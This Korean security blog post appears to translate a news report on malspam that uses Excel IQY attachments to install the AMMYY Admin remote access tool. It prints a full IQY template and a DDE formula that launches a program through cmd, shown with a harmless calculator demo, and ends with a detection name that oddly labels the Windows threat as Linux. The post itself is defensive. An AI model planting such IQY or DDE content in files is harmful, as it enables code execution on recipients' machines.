IQY 첨부파일을 사용해 안티 바이러스 필터를 우회하고 RAT을 설치하는 악성 스팸 캠페인 발견

Malspam Campaigns Using IQY Attachments to Bypass AV Filters and Install RATs

Necurs 배포하는 것 등의 악성 스팸 캠페인이 안티바이러스 및 메일 필터를 우회하는 새로운 첨부파일 타입을 활용하고 있습니다. 이 IQY 첨부파일들은 Excel Web Query 파일이며, 오픈 될 경우 외부 소스로부터 데이터를 가져오려고 시도합니다.

문제는 스프레드 시트가 가져오는 외부 데이터는 엑셀에서 실행할 수 있는 수식이 될 수 있다는 것입니다. 이 수식은 컴퓨터에 악성코드를 다운로드 하고 설치하는 PowerShell 스크립트를 로컬에서 실행하는데 사용될 수 있습니다.

IQY 첨부파일을 사용하는 악성 스팸 캠페인 3개 발견

연구원들은 IQY 첨부파일을 사용하는 스팸 캠페인 3가지를 발견했다고 밝혔습니다. 

스팸이메일은 아래와 같이 IQY 파일을 첨부한 구매 영수증, 스캔한 문서, 지불 되지 않은 인보이스로 위장합니다.

<이미지 출처 : https://www.bleepingcomputer.com/news/security/malspam-campaigns-using-iqy-attachments-to-bypass-av-filters-and-install-rats/>

IQY 파일이 오픈 되면, 이는 사전 구성 된 버전의 AMMYY Admin을 다운로드 및 설치하는 PowerShell 명령어를 실행하는 원격 사이트로 연결합니다. AMMYY Admin은 합법적인 원격 관리 툴로, 공격자들은 피해자 컴퓨터를 원격으로 제어하기 위해 이를 악용합니다.

제작이 쉬운 IQY 파일들

IQY 파일은 소스 타입, 소스 위치, 쿼리에 사용 되는 다양한 파라미터들, 새로고침 간격 등으로 구성 된 단 몇 줄의 간단한 텍스트파일입니다. 이 파일이 오픈 되면, 엑셀은 구성을 읽어오고 나열 된 소스에 연결해 스프레드시트로 가져올 데이터를 받아오려고 시도합니다.

문제는 외부 소스로부터 리턴 된 데이터가 컴퓨터에서 프로그램을 실행할 수 있는 수식을 포함할 수 있다는 것입니다.

예를 들어, C:\Windows\System32\calc.exe 파일을 오픈하는 간단한 IQY을 생성하려면 메모장에서 test.iqy 파일을 생성 후 아래의 텍스트를 입력하면 됩니다:

WEB

1

https://www.bleepingcomputer.com/misc/test.txt

2

a

3

b

4

c

5

사용자가 이 첨부파일을 오픈하면, 엑셀은 스프레드 시트로 가져올 데이터를 받아오기 위해 IQY 파일에 나열 된 원격 URL을 쿼리할 것입니다. 이 예시에서, test.txt 파일은 엑셀로 로드 되어 실행 되는 수식을 포함하고 있습니다.

=cmd|' /c C:\Windows\System32\calc.exe'!A0

이 수식은 컴퓨터의 calc.exe 프로그램을 실행하게 됩니다.

악성 스팸 캠페인도 동일한 방식을 사용하지만, 그들은 계산기를 시작하는 대신 악성코드를 설치 및 실행하는 스크립트를 다운로드 및 실행하는 PowerShell 명령어를 실행할 것입니다.

엑셀은 여러 차례 경고합니다. 무시하지 마세요!

좋은 소식은, 사용자가 뭔가 옳지 않은 것으로 보이는 IQY 파일을 실행할 경우 많은 경고를 보여줍니다. 하지만, 사람들은 경고를 무시하는 경향이 있어 감염 되기 쉽습니다. 악성 IQY 문서를 실행할 때 ‘활성화’ 또는 ‘네’를 선택하기 전 경고와 관련 된 내용을 이해하는 것은 매우 중요합니다.

사용자가 IQY 파일을 처음 실행하면, 사용자에게 외부 데이터 연결이 이루어지고 있다는 것을 알리는 “Microsoft Excel 보안 알림”이 표시 될 것입니다. 여기서 사용자는 ‘사용 안함’ 버튼을 클릭해야 합니다.

만약 여기서 “사용”버튼을 클릭할 경우, “엑셀이 다른 응용 프로그램을 시작해야 합니다”라는 또 다른 경고가 표시 됩니다. 사용자들은 이를 허용하지 말고 “아니오” 버튼을 눌러야 합니다.

만약 이 경고마저 무시한다면, 사용자의 컴퓨터는 악성코드에 감염될 것입니다.

사용자들은 엑셀이 다른 프로그램을 실행하거나 외부 연결을 실행하도록 허용하지 말아야 할 것입니다.

현재 알약에서는 해당 악성코드에 대해 Trojan.Linux.Agent로 탐지중에 있습니다. 

출처 :

https://www.bleepingcomputer.com/news/security/malspam-campaigns-using-iqy-attachments-to-bypass-av-filters-and-install-rats/

https://blog.barkly.com/iqy-file-attack-malware-flawedammyy